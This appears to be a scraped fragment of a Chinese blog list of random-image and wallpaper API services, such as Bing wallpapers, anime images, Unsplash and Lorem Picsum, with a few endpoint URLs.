1 | https://api.dujin.org/bing/1366.php (1366*768) |
1 | https://api.mtyqx.cn/api/random.php |
小歪 API
未知名称动漫 API
樱花 API
岁月小筑随机背景 API
保罗 API
樱道随机图片
墨天逸
Unsplash
后宫漫图:
EEEDOG
东方 Project
搏天 API
汐岑 ACG
凌一 API
Lorem Picsum
API 接口文档 - 夏沫博客
Ushio API
点滴 API
Langford’s API
一铭 API
R0A1NG’s API
https://api.roaing.com/#/doc/dongmanimg
]]>JacksonXE の API
https://api.jacksonxe.cn/api/file/random?sole=